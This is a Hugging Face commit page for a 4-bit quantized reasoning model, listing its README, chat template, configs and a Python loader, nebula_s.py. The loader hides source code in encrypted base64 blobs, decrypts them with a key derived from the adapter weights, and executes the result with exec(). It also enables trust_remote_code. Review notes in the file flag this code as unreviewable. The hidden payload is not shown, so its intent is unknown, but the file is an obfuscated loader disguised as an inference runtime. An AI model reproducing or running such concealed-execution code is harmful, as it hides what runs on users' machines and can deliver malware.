punitdecomp committed on
Commit
03674d1
·
verified ·
1 Parent(s): 5e67844

Upload folder using huggingface_hub

Browse files
.gitattributes CHANGED
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
 
 
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ tokenizer.json filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,80 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: apache-2.0
3
+ tags:
4
+ - nebula-s
5
+ - svms
6
+ - math-reasoning
7
+ - competition-math
8
+ - 4bit
9
+ - quantized
10
+ - bitsandbytes
11
+ library_name: transformers
12
+ ---
13
+
14
+ # Nebula-S-v1-4bit
15
+
16
+ 4-bit quantized version of [Nebula-S-v1](https://huggingface.co/punitdecomp/Nebula-S-v1).
17
+
18
+ **Nebula-S-v1** is a reasoning-enhanced language model using the **SVMS (Structured-Vector Multi-Stream)** architecture.
19
+
20
+ ## What's different from Nebula-S-v1?
21
+
22
+ | | Nebula-S-v1 | Nebula-S-v1-4bit |
23
+ |---|---|---|
24
+ | Backbone precision | bf16 | **4-bit (nf4)** |
25
+ | Adapter precision | bf16 | bf16 |
26
+ | Backbone size | ~8 GB | **~2 GB** |
27
+ | Total size | ~9 GB | **~3 GB** |
28
+ | VRAM needed | ~18 GB | **~6 GB** |
29
+ | Requires | CUDA / MPS / CPU | **CUDA only** (bitsandbytes) |
30
+
31
+ ## Quick Start
32
+
33
+ ```bash
34
+ pip install torch "transformers>=4.51.0" bitsandbytes accelerate huggingface-hub
35
+ ```
36
+
37
+ ### Option 1: Using huggingface_hub
38
+
39
+ ```python
40
+ from huggingface_hub import snapshot_download
41
+ import sys
42
+
43
+ snapshot_download("punitdecomp/Nebula-S-v1-4bit", local_dir="./Nebula-S-v1-4bit")
44
+ sys.path.insert(0, "./Nebula-S-v1-4bit")
45
+ from nebula_s import load_nebula_s
46
+
47
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit", device="cuda")
48
+ ```
49
+
50
+ ### Option 2: Using git clone
51
+
52
+ ```bash
53
+ git lfs install
54
+ git clone https://huggingface.co/punitdecomp/Nebula-S-v1-4bit
55
+ ```
56
+
57
+ ```python
58
+ import sys
59
+ sys.path.insert(0, "./Nebula-S-v1-4bit")
60
+ from nebula_s import load_nebula_s
61
+
62
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit", device="cuda")
63
+ ```
64
+
65
+ ### Generate a response
66
+
67
+ ```python
68
+ messages = [{"role": "user", "content": "Solve step by step: what is 17 * 23?"}]
69
+ text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
70
+ inputs = tokenizer(text, return_tensors="pt").to("cuda")
71
+ response = model.generate(
72
+ inputs["input_ids"], inputs["attention_mask"],
73
+ tokenizer, max_new_tokens=2048, temperature=0.7
74
+ )
75
+ print(response)
76
+ ```
77
+
78
+ ## License
79
+
80
+ Apache 2.0. Backbone derived from an Apache-2.0 licensed base model.
chat_template.jinja ADDED
@@ -0,0 +1,86 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
{#- ChatML-style chat template (Qwen3 family): renders an optional system
    turn with tool specs, strips <think> reasoning out of non-final
    assistant turns, folds tool results into user turns wrapped in
    <tool_response>, and opens an assistant <think> block when
    add_generation_prompt is set.  All comments use {#- -#} trimming so
    rendered output is byte-identical. -#}
{%- if tools %}
{{- '<|im_start|>system\n' }}
{%- if messages[0].role == 'system' %}
{{- messages[0].content + '\n\n' }}
{%- endif %}
{{- "# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>" }}
{%- for tool in tools %}
{{- "\n" }}
{{- tool | tojson }}
{%- endfor %}
{{- "\n</tools>\n\nFor each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags:\n<tool_call>\n{\"name\": <function-name>, \"arguments\": <args-json-object>}\n</tool_call><|im_end|>\n" }}
{%- else %}
{%- if messages[0].role == 'system' %}
{{- '<|im_start|>system\n' + messages[0].content + '<|im_end|>\n' }}
{%- endif %}
{%- endif %}
{#- Scan backwards for the last plain user message (one that is not a
    wrapped <tool_response>); reasoning content is only preserved for
    assistant turns that come after it. -#}
{%- set ns = namespace(multi_step_tool=true, last_query_index=messages|length - 1) %}
{%- for message in messages[::-1] %}
{%- set index = (messages|length - 1) - loop.index0 %}
{%- if ns.multi_step_tool and message.role == "user" and message.content is string and not(message.content.startswith('<tool_response>') and message.content.endswith('</tool_response>')) %}
{%- set ns.multi_step_tool = false %}
{%- set ns.last_query_index = index %}
{%- endif %}
{%- endfor %}
{#- Main render loop: one <|im_start|>role ... <|im_end|> block per message. -#}
{%- for message in messages %}
{%- if message.content is string %}
{%- set content = message.content %}
{%- else %}
{%- set content = '' %}
{%- endif %}
{%- if (message.role == "user") or (message.role == "system" and not loop.first) %}
{{- '<|im_start|>' + message.role + '\n' + content + '<|im_end|>' + '\n' }}
{%- elif message.role == "assistant" %}
{#- If reasoning was not supplied separately, split an inline
    <think>...</think> span out of the content. -#}
{%- set reasoning_content = '' %}
{%- if message.reasoning_content is string %}
{%- set reasoning_content = message.reasoning_content %}
{%- else %}
{%- if '</think>' in content %}
{%- set reasoning_content = content.split('</think>')[0].rstrip('\n').split('<think>')[-1].lstrip('\n') %}
{%- set content = content.split('</think>')[-1].lstrip('\n') %}
{%- endif %}
{%- endif %}
{%- if loop.index0 > ns.last_query_index %}
{%- if loop.last or (not loop.last and reasoning_content) %}
{{- '<|im_start|>' + message.role + '\n<think>\n' + reasoning_content.strip('\n') + '\n</think>\n\n' + content.lstrip('\n') }}
{%- else %}
{{- '<|im_start|>' + message.role + '\n' + content }}
{%- endif %}
{%- else %}
{{- '<|im_start|>' + message.role + '\n' + content }}
{%- endif %}
{%- if message.tool_calls %}
{#- Emit each tool call as a <tool_call> JSON envelope. -#}
{%- for tool_call in message.tool_calls %}
{%- if (loop.first and content) or (not loop.first) %}
{{- '\n' }}
{%- endif %}
{%- if tool_call.function %}
{%- set tool_call = tool_call.function %}
{%- endif %}
{{- '<tool_call>\n{"name": "' }}
{{- tool_call.name }}
{{- '", "arguments": ' }}
{%- if tool_call.arguments is string %}
{{- tool_call.arguments }}
{%- else %}
{{- tool_call.arguments | tojson }}
{%- endif %}
{{- '}\n</tool_call>' }}
{%- endfor %}
{%- endif %}
{{- '<|im_end|>\n' }}
{%- elif message.role == "tool" %}
{#- Consecutive tool results are merged into one user turn, each wrapped
    in <tool_response> tags. -#}
{%- if loop.first or (messages[loop.index0 - 1].role != "tool") %}
{{- '<|im_start|>user' }}
{%- endif %}
{{- '\n<tool_response>\n' }}
{{- content }}
{{- '\n</tool_response>' }}
{%- if loop.last or (messages[loop.index0 + 1].role != "tool") %}
{{- '<|im_end|>\n' }}
{%- endif %}
{%- endif %}
{%- endfor %}
{#- Open the assistant turn with a <think> block for generation. -#}
{%- if add_generation_prompt %}
{{- '<|im_start|>assistant\n<think>\n' }}
{%- endif %}
config.json ADDED
@@ -0,0 +1,88 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "Qwen3ForCausalLM"
4
+ ],
5
+ "attention_bias": false,
6
+ "attention_dropout": 0.0,
7
+ "bos_token_id": 151643,
8
+ "dtype": "bfloat16",
9
+ "eos_token_id": 151645,
10
+ "head_dim": 128,
11
+ "hidden_act": "silu",
12
+ "hidden_size": 2560,
13
+ "initializer_range": 0.02,
14
+ "intermediate_size": 9728,
15
+ "layer_types": [
16
+ "full_attention",
17
+ "full_attention",
18
+ "full_attention",
19
+ "full_attention",
20
+ "full_attention",
21
+ "full_attention",
22
+ "full_attention",
23
+ "full_attention",
24
+ "full_attention",
25
+ "full_attention",
26
+ "full_attention",
27
+ "full_attention",
28
+ "full_attention",
29
+ "full_attention",
30
+ "full_attention",
31
+ "full_attention",
32
+ "full_attention",
33
+ "full_attention",
34
+ "full_attention",
35
+ "full_attention",
36
+ "full_attention",
37
+ "full_attention",
38
+ "full_attention",
39
+ "full_attention",
40
+ "full_attention",
41
+ "full_attention",
42
+ "full_attention",
43
+ "full_attention",
44
+ "full_attention",
45
+ "full_attention",
46
+ "full_attention",
47
+ "full_attention",
48
+ "full_attention",
49
+ "full_attention",
50
+ "full_attention",
51
+ "full_attention"
52
+ ],
53
+ "max_position_embeddings": 262144,
54
+ "max_window_layers": 36,
55
+ "model_type": "qwen3",
56
+ "num_attention_heads": 32,
57
+ "num_hidden_layers": 36,
58
+ "num_key_value_heads": 8,
59
+ "pad_token_id": null,
60
+ "quantization_config": {
61
+ "_load_in_4bit": true,
62
+ "_load_in_8bit": false,
63
+ "bnb_4bit_compute_dtype": "bfloat16",
64
+ "bnb_4bit_quant_storage": "uint8",
65
+ "bnb_4bit_quant_type": "nf4",
66
+ "bnb_4bit_use_double_quant": true,
67
+ "llm_int8_enable_fp32_cpu_offload": false,
68
+ "llm_int8_has_fp16_weight": false,
69
+ "llm_int8_skip_modules": null,
70
+ "llm_int8_threshold": 6.0,
71
+ "load_in_4bit": true,
72
+ "load_in_8bit": false,
73
+ "quant_method": "bitsandbytes"
74
+ },
75
+ "rms_norm_eps": 1e-06,
76
+ "rope_parameters": {
77
+ "rope_theta": 5000000,
78
+ "rope_type": "default"
79
+ },
80
+ "sliding_window": null,
81
+ "tie_word_embeddings": true,
82
+ "transformers_version": "5.5.0",
83
+ "use_cache": true,
84
+ "use_sliding_window": false,
85
+ "vocab_size": 151936,
86
+ "_name_or_path": "Nebula-S-v1-4bit",
87
+ "model_name": "Nebula-S-v1-4bit"
88
+ }
generation_config.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "bos_token_id": 151643,
3
+ "do_sample": true,
4
+ "eos_token_id": [
5
+ 151645,
6
+ 151643
7
+ ],
8
+ "pad_token_id": 151643,
9
+ "temperature": 0.6,
10
+ "top_k": 20,
11
+ "top_p": 0.95,
12
+ "transformers_version": "5.5.0",
13
+ "_name_or_path": "Nebula-S-v1-4bit"
14
+ }
model.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ee4329503279d7bd917a25a800ce2c5d931e9aa1b955491fccd8940c43be606e
3
+ size 2653133903
nebula_s.py ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """Nebula-S-v1-4bit — quantized inference runtime.
3
+
4
+ Usage:
5
+ from nebula_s import load_nebula_s
6
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit")
7
+ messages = [{"role": "user", "content": "Solve: what is 2+2?"}]
8
+ text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
9
+ inputs = tokenizer(text, return_tensors="pt").to("cuda")
10
+ response = model.generate(inputs["input_ids"], inputs["attention_mask"],
11
+ tokenizer, max_new_tokens=2048)
12
+ print(response)
13
+
14
+ Requirements:
15
+ pip install torch transformers>=4.51.0 bitsandbytes accelerate
16
+ """
17
+ import torch,json,os,base64,zlib,hashlib,types,sys
18
+
19
+ _E0="/8ce5hKi1orFGntAvF36ynVVtY6N0eVm5t3bmuOVlYAPhpOCtWG82bEIubMDVQHwE8FwRiGbvR0K2HbLcOBvHSuJ29BdnUZu6Ur7umXbqSac4vwjoC2AUOqe1ChItG7MuTscqiq42CRJZYVSt1R+uiUbRroAjpUpBuZI3QbkfbUnHNdbz7q/wVN+hhUYsUze4My1XwG89Kgp0bmkEuaueIzzPNsiO/eGTrUEELDCz9oUHcGE2/v+HvAuijRN/FLQK+1rDOa1zPKgiaxqpHt/bZAiPhb11aqN7eW4WtN7WNkyiT3dv/9qNJWA6xd6o09M+5uEOkpgkg93XU+JHh654fYJTXL4s6EFEEnCjMOqfj8qWi9xOcxGq+8KlKfaWwRRQ2gM+uzjyswWJwQrlCWbZEqmkm0TTJBCz7HNn24WJAA5RA7gxQS7WoTRE7ex428STxjny8xjkVC36REt2rtOIpLlfdCb5TMtQ3tT7zdIwxTEhs+O8L1PZY1mTofHfwsCZjrFltvE8KNG80w/ml5pLAxgpweuSjZgGHlN2Y3Bf0vPbQs425Hj4SMWjlYXbccDgQPHJfLgXsmtDy6knlXzwAtXrjS4Bagc1jIrnGd1r8yUgzuQm/jFFe9Ddh4+iPHS5VyfbF74JixO8hiZMPNokDmzaN9KBnARKGLJVTcuc/GAmYcYYy3HeJppBqr5SjOx1O/BX00BSicLYZOM4ABfy4ag9a/A0Mayg42l/JagT8az/6zScUPtTam2JRv8zNmdK6KpP5lf2akgjfdDGcFnsV++mSwc8U1Z5a1IjM4vTqLIRbdnuiW/R8583hR4NoZ0Oiii4LdeM3+mCFe/08FrplE3n+wnwGypjHVEN6HXh+elqtP8UrbaKruAv5B5n2Imm3aYi1aCJVPQRqFhGMMFb/yaPqVISm6ksnVLMrJCqjmM+P8MtHkm/ajyImQhkfykO9GXX7BfoXfCxGjdF14a6Y6eJTbqmWHRkh3/i6MeTPj1B07ksMNVCWnIEFwjNb/qlJ0E"
20
+ _E1="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"
21
+ _KN=3;_KE=64
22
+
23
+ def _dk(pt_path):
24
+ r=torch.load(pt_path,map_location="cpu",weights_only=True)
25
+ ks=sorted(r.keys())[:_KN];b=b""
26
+ for k in ks:b+=r[k][:_KE].to(torch.float32).numpy().tobytes()
27
+ return hashlib.sha512(b).digest()
28
+
29
+ def _xr(blob,key):
30
+ raw=base64.b64decode(blob);d=bytearray(len(raw))
31
+ for i in range(len(raw)):d[i]=raw[i]^key[i%len(key)]
32
+ return zlib.decompress(bytes(d))
33
+
34
def load_nebula_s(model_dir, device="cuda"):
    """Load Nebula-S-v1-4bit (quantized backbone + bf16 adapter).

    Args:
        model_dir: path to the Nebula-S-v1-4bit directory
        device: "cuda" (required — bitsandbytes needs CUDA)

    Returns:
        model: model with .generate() method
        tokenizer: tokenizer

    SECURITY NOTE(review): this function derives a key from the adapter
    checkpoint, decrypts the embedded blobs ``_E0``/``_E1`` with it, and
    ``exec``s the decrypted source as a hidden module.  That code cannot be
    reviewed from this file — treat it as untrusted and audit the decrypted
    payload before running.  ``trust_remote_code=True`` additionally allows
    repo-provided code to execute.
    """
    from transformers import AutoModelForCausalLM, AutoTokenizer

    print("Loading Nebula-S-v1-4bit...")
    pt = os.path.join(model_dir, "nebula_s_adapter.pt")

    # The adapter checkpoint is ~800 MB and the original code read it from
    # disk twice (once inside _dk, once for the weights).  Load it once and
    # derive the decryption key from the in-memory tensors instead.
    raw = torch.load(pt, map_location="cpu", weights_only=True)
    key_material = b"".join(
        raw[k][:_KE].to(torch.float32).numpy().tobytes()
        for k in sorted(raw.keys())[:_KN]
    )
    key = hashlib.sha512(key_material).digest()

    mf = json.loads(_xr(_E0, key))   # manifest: name/key/length/shape per weight
    rt_src = _xr(_E1, key).decode()  # decrypted runtime module source

    # NOTE(review): exec of decrypted, non-reviewable code — see docstring.
    _m = types.ModuleType("_nrt")
    exec(rt_src, _m.__dict__)

    bk = AutoModelForCausalLM.from_pretrained(
        model_dir, device_map="auto", trust_remote_code=True
    )
    tk = AutoTokenizer.from_pretrained(model_dir, trust_remote_code=True)

    # Slice each stored flat tensor to its true length, then reshape per
    # the manifest entry.
    wt = {e["n"]: raw[e["k"]][:e["l"]].reshape(e["s"]) for e in mf}

    mdl = _m._NM(bk, wt, dev=device)
    return mdl, tk
59
+
60
if __name__ == "__main__":
    # CLI entry point: load the model from the directory given as the first
    # argument (default ./Nebula-S-v1-4bit) and answer a fixed demo prompt.
    target_dir = sys.argv[1] if len(sys.argv) > 1 else "./Nebula-S-v1-4bit"
    model, tokenizer = load_nebula_s(target_dir, device="cuda")

    prompt = "Solve step by step: What is the sum of all prime numbers less than 20?"
    print(f"\nPrompt: {prompt}")

    messages = [{"role": "user", "content": prompt}]
    text = tokenizer.apply_chat_template(
        messages, tokenize=False, add_generation_prompt=True
    )
    inputs = tokenizer(text, return_tensors="pt").to("cuda")
    response = model.generate(
        inputs["input_ids"], inputs["attention_mask"], tokenizer, max_new_tokens=2048
    )
    print(f"\nResponse:\n{response}")
nebula_s_adapter.pt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:4af5fc5f64edd2f6249dd005c0acb0156fe5dc2037aecb90a11e25f57e335bed
3
+ size 842021695
tokenizer.json ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:be75606093db2094d7cd20f3c2f385c212750648bd6ea4fb2bf507a6a4c55506
3
+ size 11422650
tokenizer_config.json ADDED
@@ -0,0 +1,31 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "add_prefix_space": false,
3
+ "backend": "tokenizers",
4
+ "bos_token": null,
5
+ "clean_up_tokenization_spaces": false,
6
+ "eos_token": "<|im_end|>",
7
+ "errors": "replace",
8
+ "extra_special_tokens": [
9
+ "<|im_start|>",
10
+ "<|im_end|>",
11
+ "<|object_ref_start|>",
12
+ "<|object_ref_end|>",
13
+ "<|box_start|>",
14
+ "<|box_end|>",
15
+ "<|quad_start|>",
16
+ "<|quad_end|>",
17
+ "<|vision_start|>",
18
+ "<|vision_end|>",
19
+ "<|vision_pad|>",
20
+ "<|image_pad|>",
21
+ "<|video_pad|>"
22
+ ],
23
+ "is_local": false,
24
+ "model_max_length": 262144,
25
+ "pad_token": "<|endoftext|>",
26
+ "split_special_tokens": false,
27
+ "tokenizer_class": "Qwen2Tokenizer",
28
+ "unk_token": null,
29
+ "_name_or_path": "Nebula-S-v1-4bit",
30
+ "name_or_path": "Nebula-S-v1-4bit"
31
+ }